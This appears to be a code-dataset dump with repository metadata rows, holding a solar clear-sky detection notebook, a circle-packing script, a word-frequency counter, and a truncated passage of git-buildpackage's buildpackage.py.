# <p><div class="lev1 toc-item"><a href="#Import-and-setup-data" data-toc-modified-id="Import-and-setup-data-1"><span class="toc-item-num">1 </span>Import and setup data</a></div><div class="lev1 toc-item"><a href="#Train-model" data-toc-modified-id="Train-model-2"><span class="toc-item-num">2 </span>Train model</a></div><div class="lev1 toc-item"><a href="#Test-on-ground-data" data-toc-modified-id="Test-on-ground-data-3"><span class="toc-item-num">3 </span>Test on ground data</a></div><div class="lev2 toc-item"><a href="#SRRL" data-toc-modified-id="SRRL-31"><span class="toc-item-num">3.1 </span>SRRL</a></div><div class="lev2 toc-item"><a href="#Sandia-RTC" data-toc-modified-id="Sandia-RTC-32"><span class="toc-item-num">3.2 </span>Sandia RTC</a></div><div class="lev2 toc-item"><a href="#ORNL" data-toc-modified-id="ORNL-33"><span class="toc-item-num">3.3 </span>ORNL</a></div>
# In[1]:
# Core scientific stack, plotting, and project-local helpers.
import pandas as pd
import numpy as np
import os
import datetime
import matplotlib
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
from sklearn import tree
import pytz
import itertools
import visualize
import utils
import pydotplus
from sklearn import metrics
from sklearn import ensemble
from sklearn import linear_model
import pvlib
import cs_detection
# NOTE(review): this re-binds `visualize`, shadowing the plain
# `import visualize` above — presumably the plotly backend is the one intended.
import visualize_plotly as visualize
from IPython.display import Image
# Notebook conveniences: auto-reload edited modules and use the notebook
# matplotlib backend for interactive figures.
get_ipython().magic('load_ext autoreload')
get_ipython().magic('autoreload 2')
np.set_printoptions(precision=4)
get_ipython().magic('matplotlib notebook')
import warnings
# Silence library warnings for cleaner notebook output.
warnings.filterwarnings('ignore')
# # Import and setup data
# Only making ground predictions using PVLib clearsky model and statistical model. NSRDB model won't be available to ground measurements.
# In[2]:
nsrdb_srrl = cs_detection.ClearskyDetection.read_pickle('srrl_nsrdb_1.pkl.gz')
nsrdb_srrl.df.index = nsrdb_srrl.df.index.tz_convert('MST')
nsrdb_srrl.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
nsrdb_abq = cs_detection.ClearskyDetection.read_pickle('abq_nsrdb_1.pkl.gz')
nsrdb_abq.df.index = nsrdb_abq.df.index.tz_convert('MST')
nsrdb_abq.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
nsrdb_ornl = cs_detection.ClearskyDetection.read_pickle('ornl_nsrdb_1.pkl.gz')
nsrdb_ornl.df.index = nsrdb_ornl.df.index.tz_convert('EST')
nsrdb_ornl.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
# # Train model
# * Train model on all available NSRBD data
# * ORNL
# * Sandia RTC
# * SRRL
#
# 1. Scale model clearsky (PVLib)
# 2. Calculate training metrics
# 3. Train model
# In[3]:
nsrdb_srrl.scale_model('GHI', 'Clearsky GHI pvlib', 'sky_status')
nsrdb_abq.scale_model('GHI', 'Clearsky GHI pvlib', 'sky_status')
nsrdb_ornl.scale_model('GHI', 'Clearsky GHI pvlib', 'sky_status')
# In[4]:
utils.calc_all_window_metrics(nsrdb_srrl.df, 3, meas_col='GHI', model_col='Clearsky GHI pvlib', overwrite=True)
utils.calc_all_window_metrics(nsrdb_abq.df, 3, meas_col='GHI', model_col='Clearsky GHI pvlib', overwrite=True)
utils.calc_all_window_metrics(nsrdb_ornl.df, 3, meas_col='GHI', model_col='Clearsky GHI pvlib', overwrite=True)
# In[5]:
feature_cols = [
'tfn',
'abs_ideal_ratio_diff',
'abs_ideal_ratio_diff mean',
'abs_ideal_ratio_diff std',
'abs_ideal_ratio_diff max',
'abs_ideal_ratio_diff min',
'GHI Clearsky GHI pvlib gradient ratio',
'GHI Clearsky GHI pvlib gradient ratio mean',
'GHI Clearsky GHI pvlib gradient ratio std',
'GHI Clearsky GHI pvlib gradient ratio min',
'GHI Clearsky GHI pvlib gradient ratio max',
'GHI Clearsky GHI pvlib gradient second ratio',
'GHI Clearsky GHI pvlib gradient second ratio mean',
'GHI Clearsky GHI pvlib gradient second ratio std',
'GHI Clearsky GHI pvlib gradient second ratio min',
'GHI Clearsky GHI pvlib gradient second ratio max',
'GHI Clearsky GHI pvlib line length ratio',
'GHI Clearsky GHI pvlib line length ratio gradient',
'GHI Clearsky GHI pvlib line length ratio gradient second'
]
target_cols = ['sky_status']
vis = visualize.Visualizer()
vis.plot_corr_matrix(nsrdb_srrl.df[feature_cols].corr().values, labels=feature_cols)
# In[6]:
best_params = {'max_depth': 4, 'n_estimators': 128}
# In[7]:
clf = ensemble.RandomForestClassifier(**best_params, n_jobs=-1)
# In[8]:
X = np.vstack((nsrdb_srrl.df[feature_cols].values,
nsrdb_abq.df[feature_cols].values,
nsrdb_ornl.df[feature_cols].values))
y = np.vstack((nsrdb_srrl.df[target_cols].values,
nsrdb_abq.df[target_cols].values,
nsrdb_ornl.df[target_cols].values))
vis = visualize.Visualizer()
vis.plot_corr_matrix(nsrdb_srrl.df[feature_cols].corr().values, labels=feature_cols)
# In[ ]:
# In[9]:
get_ipython().run_cell_magic('time', '', 'clf.fit(X, y.flatten())')
# # Test on ground data
# ## SRRL
# In[10]:
ground = cs_detection.ClearskyDetection.read_pickle('srrl_ground_1.pkl.gz')
# In[11]:
ground.df.index = ground.df.index.tz_convert('MST')
# In[12]:
ground.trim_dates('10-01-2011', '10-16-2011')
# In[13]:
ground.scale_model('GHI', 'Clearsky GHI pvlib', 'sky_status pvlib')
# In[14]:
ground.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
# In[15]:
test = ground
# In[16]:
pred = test.iter_predict_daily(feature_cols, 'GHI', 'Clearsky GHI pvlib', clf, 61, by_day=True, multiproc=True)
pred = pred.astype(bool)
# In[17]:
vis = visualize.Visualizer()
# In[18]:
vis.add_line_ser(test.df['GHI'], 'GHI')
vis.add_line_ser(test.df['Clearsky GHI pvlib'], 'GHI_cs')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 0) & (pred)]['GHI'], 'ML clear only')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 1) & (~pred)]['GHI'], 'PVLib clear only')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 1) & (pred)]['GHI'], 'ML+PVLib clear only')
vis.add_line_ser(test.df['abs_ideal_ratio_diff'] * 100)
# In[19]:
vis.show()
# In[20]:
ground = cs_detection.ClearskyDetection.read_pickle('srrl_ground_1.pkl.gz')
# In[21]:
ground.df.index = ground.df.index.tz_convert('MST')
# In[22]:
ground.trim_dates('10-01-2011', '10-16-2011')
# In[23]:
ground.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
# In[24]:
ground.df = ground.df.resample('30T').apply(lambda x: x[len(x) // 2])
# In[25]:
test= ground
# In[26]:
pred = test.iter_predict_daily(feature_cols, 'GHI', 'Clearsky GHI pvlib', clf, 3, by_day=True, multiproc=True)
pred = pred.astype(bool)
# In[27]:
vis = visualize.Visualizer()
# In[28]:
srrl_tmp = cs_detection.ClearskyDetection(nsrdb_srrl.df)
srrl_tmp.intersection(ground.df.index)
vis.add_line_ser(test.df['GHI'], 'GHI')
vis.add_line_ser(test.df['Clearsky GHI pvlib'], 'GHI_cs')
vis.add_circle_ser(test.df[(srrl_tmp.df['sky_status'] == 0) & (pred)]['GHI'], 'ML clear only')
vis.add_circle_ser(test.df[(srrl_tmp.df['sky_status'] == 1) & (~pred)]['GHI'], 'NSRDB clear only')
vis.add_circle_ser(test.df[(srrl_tmp.df['sky_status'] == 1) & (pred)]['GHI'], 'ML+NSRDB clear only')
vis.add_line_ser(test.df['abs_ideal_ratio_diff'] * 100)
# In[29]:
vis.show()
# In[ ]:
# ## Sandia RTC
# In[30]:
ground = cs_detection.ClearskyDetection.read_pickle('abq_ground_1.pkl.gz')
# In[31]:
ground.df.index = ground.df.index.tz_convert('MST')
# In[32]:
ground.trim_dates('10-01-2015', '10-16-2015')
# In[33]:
ground.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
# In[34]:
test = ground
# In[35]:
pred = test.iter_predict_daily(feature_cols, 'GHI', 'Clearsky GHI pvlib', clf, 61, by_day=True, multiproc=True)
pred = pred.astype(bool)
# In[36]:
vis = visualize.Visualizer()
# In[37]:
vis.add_line_ser(test.df['GHI'], 'GHI')
vis.add_line_ser(test.df['Clearsky GHI pvlib'], 'GHI_cs')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 0) & (pred)]['GHI'], 'ML clear only')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 1) & (~pred)]['GHI'], 'PVLib clear only')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 1) & (pred)]['GHI'], 'ML+PVLib clear only')
vis.add_line_ser(test.df['abs_ideal_ratio_diff'] * 100)
# In[38]:
vis.show()
# In[39]:
ground = cs_detection.ClearskyDetection.read_pickle('abq_ground_1.pkl.gz')
# In[40]:
ground.df.index = ground.df.index.tz_convert('MST')
# In[41]:
ground.trim_dates('10-01-2015', '10-16-2015')
# In[42]:
ground.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
# In[43]:
ground.df = ground.df.resample('30T').apply(lambda x: x[len(x) // 2])
# In[44]:
test= ground
# In[45]:
pred = test.iter_predict_daily(feature_cols, 'GHI', 'Clearsky GHI pvlib', clf, 3, by_day=True, multiproc=True)
pred = pred.astype(bool)
# In[46]:
vis = visualize.Visualizer()
# In[47]:
abq_tmp = cs_detection.ClearskyDetection(nsrdb_abq.df)
abq_tmp.intersection(ground.df.index)
vis.add_line_ser(test.df['GHI'], 'GHI')
vis.add_line_ser(test.df['Clearsky GHI pvlib'], 'GHI_cs')
vis.add_circle_ser(test.df[(abq_tmp.df['sky_status'] == 0) & (pred)]['GHI'], 'ML clear only')
vis.add_circle_ser(test.df[(abq_tmp.df['sky_status'] == 1) & (~pred)]['GHI'], 'NSRDB clear only')
vis.add_circle_ser(test.df[(abq_tmp.df['sky_status'] == 1) & (pred)]['GHI'], 'ML+NSRDB clear only')
vis.add_line_ser(test.df['abs_ideal_ratio_diff'] * 100)
# In[48]:
vis.show()
# ## ORNL
# In[49]:
ground = cs_detection.ClearskyDetection.read_pickle('ornl_ground_1.pkl.gz')
# In[50]:
ground.trim_dates('10-01-2008', '10-16-2008')
# In[51]:
ground.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
# In[52]:
ground.scale_model('GHI', 'Clearsky GHI pvlib', 'sky_status pvlib')
# In[53]:
test = ground
# In[54]:
# pred = clf.predict(test.df[feature_cols].values)
pred = test.iter_predict_daily(feature_cols, 'GHI', 'Clearsky GHI pvlib', clf, 61, by_day=True, multiproc=True)
pred = pred.astype(bool)
# In[55]:
vis = visualize.Visualizer()
# In[56]:
vis.add_line_ser(test.df['GHI'], 'GHI')
vis.add_line_ser(test.df['Clearsky GHI pvlib'], 'GHI_cs')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 0) & (pred)]['GHI'], 'ML clear only')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 1) & (~pred)]['GHI'], 'PVLib clear only')
vis.add_circle_ser(test.df[(test.df['sky_status pvlib'] == 1) & (pred)]['GHI'], 'ML+PVLib clear only')
vis.add_line_ser(test.df['abs_ideal_ratio_diff'] * 100)
# In[57]:
vis.show()
# In[58]:
ground = cs_detection.ClearskyDetection.read_pickle('ornl_ground_1.pkl.gz')
# In[59]:
ground.df.index = ground.df.index.tz_convert('EST')
# In[60]:
ground.trim_dates('10-01-2008', '10-16-2008')
# In[61]:
ground.time_from_solar_noon('Clearsky GHI pvlib', 'tfn')
# In[62]:
ground.df = ground.df.resample('30T').apply(lambda x: x[len(x) // 2])
# In[63]:
test= ground
# In[64]:
pred = test.iter_predict_daily(feature_cols, 'GHI', 'Clearsky GHI pvlib', clf, 3, by_day=True, multiproc=True)
pred = pred.astype(bool)
# In[65]:
vis = visualize.Visualizer()
# In[66]:
ornl_tmp = cs_detection.ClearskyDetection(nsrdb_ornl.df)
ornl_tmp.intersection(ground.df.index)
vis.add_line_ser(test.df['GHI'], 'GHI')
vis.add_line_ser(test.df['Clearsky GHI pvlib'], 'GHI_cs')
vis.add_circle_ser(test.df[(ornl_tmp.df['sky_status'] == 0) & (pred)]['GHI'], 'ML clear only')
vis.add_circle_ser(test.df[(ornl_tmp.df['sky_status'] == 1) & (~pred)]['GHI'], 'NSRDB clear only')
vis.add_circle_ser(test.df[(ornl_tmp.df['sky_status'] == 1) & (pred)]['GHI'], 'ML+NSRDB clear only')
vis.add_line_ser(test.df['abs_ideal_ratio_diff'] * 100)
# In[67]:
vis.show()
# In[68]:
vis = visualize.Visualizer()
vis.add_bar(feature_cols, clf.feature_importances_)
vis.show()
# In[69]:
import pickle
# In[70]:
with open('trained_model.pkl', 'wb') as f:
pickle.dump(clf, f)
# In[71]:
with open('trained_model.pkl', 'rb') as f:
new_clf = pickle.load(f)
# In[72]:
new_clf is clf
# In[73]:
clf.get_params()
# In[74]:
new_clf.get_params()
# In[ ]:
| [
"ellis.bh89@gmail.com"
] | ellis.bh89@gmail.com |
498ead3462fc012d19f998fbd9745d488750c4cc | 1843a687308bbdd664f9edf763145d27ee826eb6 | /unit3/cir-pack_tsc.py | a10f57950a51b2fc621569b2aea7e77501a7d65f | [] | no_license | Lupen14461/study1 | 1f47c4d1d0362c4db9dd92c35d72c92eaf59d634 | a29eb8a8b98ff8d739c64e45e7db649ae30cf5d5 | refs/heads/master | 2021-01-06T14:24:09.426103 | 2020-05-27T03:52:24 | 2020-05-27T03:52:24 | 241,359,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,027 | py | '''
在查询资料和与其他同学讨论后,
'''
import numpy as np
import random
import matplotlib.pyplot as plt
from scipy.optimize import minimize
#定义圆类
class circle:
def __init__(self, radius = 0, x = 0, y = 0):
self.radius = radius
self.x = x
self.y = y
def print_circle(self):
print('radius={}, coordinate=({},{})'.format(self.radius, self.x, self.y))
#计算两圆心之间距离
def distance(self, c2):
dis = ((self.x-c2.x)**2+(self.y-c2.y)**2)**0.5
return dis
#判断新圆与现存圆是否相交,相交为0,全不相交为1
def ifcross(self, c_list):
for i in range (len(c_list)):
c2 = c_list[i]
r1 = self.radius
r2 = c2.radius
rr = r1+r2
dis = self.distance(c2)
if dis < rr:
return 0
return 1
#判断圆是否越界,越界为0,不越界为1
def ifexcess(self):
r = self.radius
x = self.x
y = self.y
if x + r > 1 or x - r < -1 or y + r > 1 or y - r < -1:
return 0
else:
return 1
#找出可行的最大半径
def MaxR(c1, c_list):
x = c1.x
y = c1.y
R_list = [1-x,1+x,1-y,1+y]
for i in range (len(c_list)):
c2 = c_list[i]
dis = c1.distance(c2)
R_list.append(dis-c2.radius)
return min(R_list)
#需要优化的目标函数
def func(c_list):
return lambda x : 1 - MaxR(circle(x[0], x[1], x[2]), c_list)
#找出最优圆心
def opt_center(c, c_list):
r = c.radius
x = c.x
y = c.y
rxy = [r,x,y]
bd_r = (0, 1)
bd_x = (-1, 1)
bd_y = (-1, 1)
bds = (bd_r, bd_x, bd_y)
res = minimize(func(c_list), rxy, method='SLSQP', bounds=bds)
c.x = res.x[1]
c.y = res.x[2]
c.radius = MaxR(c, c_list)
return c
#找m个圆,使得每个圆在邻域内半径最大
def FindMaxCircuit(m):
c_list = []
for i in range (m):
r = 0
x = random.uniform(-1, 1)
y = random.uniform(-1, 1)
c = circle(r, x, y)
while not c.ifcross(c_list):
x = random.uniform(-1, 1)
y = random.uniform(-1, 1)
c = circle(r, x, y)
c = opt_center(c, c_list)
c_list.append(c)
return c_list
def plot(c_list):
plt.figure()
plt.axes().set_aspect('equal')
plt.xlim([-1,1])
plt.ylim([-1,1])
theta = np.linspace(0,2*np.pi,50)
for c in c_list:
plt.plot(c.x+c.radius*np.cos(theta),c.y+c.radius*np.sin(theta),'b')
plt.show()
if __name__ == "__main__":
m = 60
c_list = FindMaxCircuit(m)
RR = 0
for c in c_list:
RR += c.radius**2
c.print_circle()
print('for {} circles, the maximize sum of r^2 = {}'.format(m, RR))
plot(c_list) | [
"noreply@github.com"
] | noreply@github.com |
6823c5360f70885ef30f899985476cec8c48d191 | e5c95e04821214d2f89bf9f48765dbe5ae04d3bf | /19100305/luokaiwen1022/mymodule/stats_word.py | 843077821e40dbc8c2d61d0b3834f6473bf35a65 | [] | no_license | qiming09/selfteaching-python-camp | 89270b98fa6080f4abe72f14ca0dd9441edbc493 | 48f5533ffa6fb7d82afa614346ad7e52e4e32e02 | refs/heads/master | 2020-04-29T16:25:59.059775 | 2019-04-02T06:45:02 | 2019-04-02T06:45:02 | 176,259,780 | 2 | 0 | null | 2019-03-18T10:34:32 | 2019-03-18T10:34:32 | null | UTF-8 | Python | false | false | 3,807 | py | # 示例字符串
string1 = '''
The Zen of Python, by Tim Peters
Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambxiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!
Python是一种计算机程序设计语言。是一种动态的、面向对象的脚本语言,最初被设计用于编写自动化脚本(shell),随着版本的不断更新和语言新功能的添加,越来越多被用于独立的、大型项目的开发。
'''
import collections
import re
def stats_text_en(string_en):
''' 统计英文词频
第一步:过滤英文字符,并将string拆分为list。
第二步:清理*-等标点符号。
第三步:使用collections库中的Counter函数进行词频统计并输出统计结果。
'''
print("处理前的原始字符串\n\n",string_en)
result = re.sub("[^A-Za-z]", " ", string_en.strip())#把非A-Z和a-z的字符串全部去除掉
print("处理后的结果\n\n",result)
newList = result.split( )
i=0
for i in range(0,len(newList)):
newList[i]=newList[i].strip('*-,.?!')
if newList[i]==' ':
newList[i].remove(' ')
else:
i=i+1
# print('英文单词词频统计结果: ',collections.Counter(newList),'\n')
def stats_text_cn(string_cn):
''' 统计中文汉字字频
第一步:过滤汉字字符,并定义频率统计函数 stats()。
第二步:清除文本中的标点字符,将非标点字符组成新列表 new_list。
第三步:遍历列表,将字符同上一次循环中频率统计结果作为形参传给统计函数stats()。
第四步:统计函数在上一次统计结果基础上得出本次统计结果,赋值给newDict。
第五步:new_list遍历结束,输出倒序排列的统计结果。
'''
result1 = re.findall(u'[\u4e00-\u9fff]+', string_cn)
newString = ''.join(result1)
def stats(orgString, newDict) :
d = newDict
for m in orgString :
d[m] = d.get(m, 0) + 1
return d
new_list = []
for char in newString :
cn = char.strip('-*、。,:?!……')
new_list.append(cn)
words = dict()
for n in range(0,len(new_list)) :
words = stats(new_list[n],words)
newWords = sorted(words.items(), key=lambda item: item[1], reverse=True)
print('中文汉字字频统计结果: ',dict(newWords))
# 调用函数
stats_text_en(string1)
# stats_text_cn(string1)
# stats_text 函数,实现调用stats_text_en , stats_text_cn ,输出合并词频统计结果
import collections
import re
def stats_text_en(en) :
''' 英文词频统计'''
text_en = re.sub("[^A-Za-z]", " ", en.strip())
enList = text_en.split( )
return collections.Counter(enList)
def stats_text_cn(cn) :
''' 汉字字频统计 '''
cnList = re.findall(u'[\u4e00-\u9fff]+', cn.strip())
cnString = ''.join(cnList)
return collections.Counter(cnString)
def stats_text(text_en_cn) :
''' 合并英汉词频统计 '''
return (stats_text_en(text_en_cn)+stats_text_cn(text_en_cn)) | [
"48680863+luokaiwen1022@users.noreply.github.com"
] | 48680863+luokaiwen1022@users.noreply.github.com |
158643e767b1a1c837712b33c42139e665d84784 | bb0b9f5923e1ac4914b70c38a851fa3b8b92f154 | /gbp/scripts/buildpackage.py | d59a76d86c421a18c3c93d2ee34a8821b642b5f5 | [] | no_license | hzsunzixiang/git-buildpackage | 89a4ff667418325b8f31563545de437e5222ecd2 | 0a067f0e06f105ade703b8f4d56f379c5b30ccf2 | refs/heads/master | 2016-09-02T06:27:34.473182 | 2014-05-11T04:16:07 | 2014-05-11T04:16:07 | 19,658,170 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 28,035 | py | # vim: set fileencoding=utf-8 :
#
# (C) 2006-2013 Guido Günther <agx@sigxcpu.org>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
"""run commands to build a debian package out of a git repository"""
import ConfigParser
import errno
import os, os.path
import sys
import time
import gbp.deb as du
from gbp.command_wrappers import (Command,
RunAtCommand, CommandExecFailed,
RemoveTree)
from gbp.config import (GbpOptionParserDebian, GbpOptionGroup)
from gbp.deb.git import (GitRepositoryError, DebianGitRepository)
from gbp.deb.source import DebianSource, DebianSourceError
from gbp.git.vfs import GitVfs
from gbp.errors import GbpError
import gbp.log
import gbp.notifications
from gbp.scripts.common.buildpackage import (index_name, wc_name,
git_archive_submodules,
git_archive_single, dump_tree,
write_wc, drop_index)
from gbp.pkg import (UpstreamSource, compressor_opts, compressor_aliases)
def git_archive(repo, cp, output_dir, treeish, comp_type, comp_level, with_submodules):
    """
    Create a compressed orig tarball in I{output_dir} using git archive

    @param repo: the git repository to create the archive from
    @param cp: the package's changelog (provides source name and version)
    @param output_dir: directory to put the tarball into
    @param treeish: treeish to create the archive from
    @param comp_type: compression type (key of L{compressor_opts})
    @param comp_level: compression level passed to the compressor
    @param with_submodules: whether to include submodule contents
    @return: C{True} on success, C{False} on (non fatal) errors
    @raises GbpError: on an unsupported compression type
    """
    try:
        comp_opts = compressor_opts[comp_type][0]
    except KeyError:
        raise GbpError("Unsupported compression type '%s'" % comp_type)
    output = os.path.join(output_dir, du.orig_file(cp, comp_type))
    prefix = "%s-%s" % (cp['Source'], cp['Upstream-Version'])

    try:
        if repo.has_submodules() and with_submodules:
            # Submodule contents aren't part of the superproject's treeish
            # so they have to be archived and concatenated separately:
            repo.update_submodules()
            git_archive_submodules(repo, treeish, output, prefix,
                                   comp_type, comp_level, comp_opts)

        else:
            git_archive_single(treeish, output, prefix,
                               comp_type, comp_level, comp_opts)
    except (GitRepositoryError, CommandExecFailed) as err:
        # This branch is also reached from the plain git_archive_single()
        # path, so don't claim it's submodule specific:
        gbp.log.err("Error creating %s: %s" % (output, err))
        return False
    except OSError as err:
        # err.strerror works on Python 2 and 3, unlike the py2-only err[0]
        gbp.log.err("Error creating %s: %s" % (output, err.strerror))
        return False
    except GbpError:
        raise
    except Exception as e:
        gbp.log.err("Error creating %s: %s" % (output, e))
        return False
    return True
def prepare_upstream_tarball(repo, cp, options, tarball_dir, output_dir):
    """
    Ensure an upstream tarball is available in I{output_dir}.

    First look in I{tarball_dir} and symlink a tarball found there,
    then build one (via pristine-tar or git-archive) unless creation
    is disabled or a tarball already exists.
    """
    options.comp_type = guess_comp_type(repo,
                                        options.comp_type,
                                        cp,
                                        options.tarball_dir)
    orig_file = du.orig_file(cp, options.comp_type)

    # Prefer a pre-existing tarball from tarball_dir, forcing a symlink to it
    if options.tarball_dir:
        gbp.log.debug("Looking for orig tarball '%s' at '%s'" % (orig_file, tarball_dir))
        linked = du.DebianPkgPolicy.symlink_orig(orig_file, tarball_dir,
                                                 output_dir, force=True)
        if linked:
            gbp.log.info("Orig tarball '%s' found at '%s'" % (orig_file, tarball_dir))
        else:
            gbp.log.info("Orig tarball '%s' not found at '%s'" % (orig_file, tarball_dir))

    # Build an orig unless the user forbids it; always build (and overwrite
    # a pre-existing one) if the user forces it
    must_build = options.force_create or (
        not options.no_create_orig and
        not du.DebianPkgPolicy.has_orig(orig_file, output_dir))
    if not must_build:
        return

    if pristine_tar_build_orig(repo, cp, output_dir, options):
        return

    upstream_tree = git_archive_build_orig(repo, cp, output_dir, options)
    if options.pristine_tar_commit:
        if repo.pristine_tar.has_commit(cp.name,
                                        cp.upstream_version,
                                        options.comp_type):
            gbp.log.debug("%s already on pristine tar branch" %
                          orig_file)
        else:
            archive = os.path.join(output_dir, orig_file)
            gbp.log.debug("Adding %s to pristine-tar branch" %
                          archive)
            repo.pristine_tar.commit(archive, upstream_tree)
#{ Functions to handle export-dir
def write_tree(repo, options):
    """
    Write a tree of the index or working copy if necessary

    @param repo: the git repository we're acting on
    @type repo: L{GitRepository}
    @return: the sha1 of the tree, or C{None} when not exporting
    @rtype: C{str}
    @raises GbpError: when the configured treeish is invalid
    """
    if not options.export_dir:
        # Building in place - no tree needs to be written
        return None

    if options.export == index_name:
        return repo.write_tree()
    elif options.export == wc_name:
        return write_wc(repo)

    # Any other value names the treeish to export directly
    treeish = options.export
    if not repo.has_treeish(treeish):
        raise GbpError("%s is not a valid treeish" % treeish)
    return treeish
def export_source(repo, tree, source, options, dest_dir, tarball_dir):
    """
    Export a version of the source tree when building in a separate directory

    @param repo: the git repository to export from
    @type repo: L{gbp.git.GitRepository}
    @param tree: treeish to export
    @param source: the source package
    @param options: options to apply
    @param dest_dir: where to export the source to
    @param tarball_dir: where to fetch the tarball from in overlay mode
    @raises GbpError: on a native package in overlay mode or a failed export
    """
    if options.overlay:
        # Overlay mode: unpack the upstream tarball first so the exported
        # tree ends up on top of it. Native packages have no upstream
        # tarball, so this can't work for them.
        if source.is_native():
            raise GbpError("Cannot overlay Debian native package")
        tarball = os.path.join(tarball_dir,
                               du.orig_file(source.changelog,
                                            options.comp_type))
        extract_orig(tarball, dest_dir)

    gbp.log.info("Exporting '%s' to '%s'" % (options.export, dest_dir))
    if not dump_tree(repo, dest_dir, tree, options.with_submodules):
        raise GbpError
def move_old_export(target):
    """
    Move an already existing build tree out of the way

    If I{target} doesn't exist it is created. If it does exist it is
    renamed to I{target}C{.obsolete.<timestamp>}; note that I{target}
    itself no longer exists afterwards in that case.

    @param target: the build tree directory to create or move away
    @type target: C{str}
    """
    try:
        os.mkdir(target)
    except OSError as err:
        # 'except OSError as (e, msg)' is Python 2 only syntax; checking
        # err.errno works on Python 2 and 3.
        if err.errno == errno.EEXIST:
            os.rename(target, "%s.obsolete.%s" % (target, time.time()))
        else:
            # Don't silently swallow real errors (EACCES, ENOENT, ...)
            raise
def extract_orig(orig_tarball, dest_dir):
    """
    Unpack the upstream tarball to the export dir before exporting from git

    @param orig_tarball: path of the tarball to unpack
    @param dest_dir: directory to unpack the sources into
    """
    gbp.log.info("Extracting %s to '%s'" % (os.path.basename(orig_tarball), dest_dir))

    move_old_export(dest_dir)
    src = UpstreamSource(orig_tarball)
    src.unpack(dest_dir)

    # A tarball containing a single top level folder unpacks into a
    # subdirectory of dest_dir. In that case shuffle its contents up
    # into dest_dir itself:
    if src.unpacked != dest_dir:
        gbp.log.debug("Moving %s to %s" % (src.unpacked, dest_dir))
        staging = dest_dir + '.new'
        os.rename(src.unpacked, staging)
        os.rmdir(dest_dir)
        os.rename(staging, dest_dir)
#}
def source_vfs(repo, options, tree):
    """
    Set up the Debian source package, reading either from a git tree
    or from the working copy

    @param repo: the git repository to read from
    @param options: parsed command line options (currently unused here)
    @param tree: treeish to read the package from; working copy if empty
    @return: the source package
    @rtype: L{DebianSource}
    @raises GbpError: when the package type can't be determined
    """
    # FIXME: just init the correct vfs
    try:
        source = DebianSource(GitVfs(repo, tree) if tree else '.')
        source.is_native()  # fail early if the package type can't be determined
    except Exception as e:
        raise GbpError("Can't determine package type: %s" % e)
    return source
def prepare_output_dir(dir):
    """
    Prepare the directory the build result will be put into

    Creates the directory if necessary (an already existing one is
    fine) and returns its absolute path. An empty argument means the
    parent directory.

    @param dir: the requested output directory; the parameter name
        shadows the builtin but is kept for interface compatibility
    @type dir: C{str}
    @return: absolute path of the output directory
    @rtype: C{str}
    @raises GbpError: when the directory can't be created
    """
    output_dir = os.path.abspath(dir or '..')
    try:
        os.mkdir(output_dir)
    except OSError as err:
        # 'except OSError as (e, msg)' is Python 2 only syntax; checking
        # err.errno works on Python 2 and 3. EEXIST is fine, anything
        # else means we can't use the directory.
        if err.errno != errno.EEXIST:
            raise GbpError("Cannot create output dir %s" % output_dir)
    return output_dir
def pristine_tar_build_orig(repo, cp, output_dir, options):
    """
    Build the orig tarball using pristine-tar

    @return: C{True} when the tarball was built, C{False} when nothing
        was done (pristine-tar disabled, or the checkout failed while a
        fresh pristine-tar commit was requested)
    """
    if not options.pristine_tar:
        return False

    if not repo.has_branch(repo.pristine_tar_branch):
        gbp.log.warn('Pristine-tar branch "%s" not found' %
                     repo.pristine_tar.branch)
    try:
        repo.pristine_tar.checkout(cp.name,
                                   cp.upstream_version,
                                   options.comp_type,
                                   output_dir)
    except CommandExecFailed:
        # With --pristine-tar-commit a failed checkout isn't fatal: the
        # tarball will be built another way and committed afterwards
        if not options.pristine_tar_commit:
            raise
        gbp.log.debug("pristine-tar checkout failed, "
                      "will commit tarball due to "
                      "'--pristine-tar-commit'")
        return False
    return True
def get_upstream_tree(repo, cp, options):
    """
    Determine the upstream tree from the given options

    @return: the treeish to build the upstream tarball from
    @raises GbpError: when the branch or treeish doesn't exist
    """
    choice = options.upstream_tree.upper()
    if choice == 'TAG':
        tree = repo.version_to_tag(options.upstream_tag,
                                   cp['Upstream-Version'])
    elif choice == 'BRANCH':
        if not repo.has_branch(options.upstream_branch):
            raise GbpError("%s is not a valid branch" % options.upstream_branch)
        tree = options.upstream_branch
    else:
        # Any other value is taken as the treeish itself
        tree = options.upstream_tree
    if not repo.has_treeish(tree):
        raise GbpError("%s is not a valid treeish" % tree)
    return tree
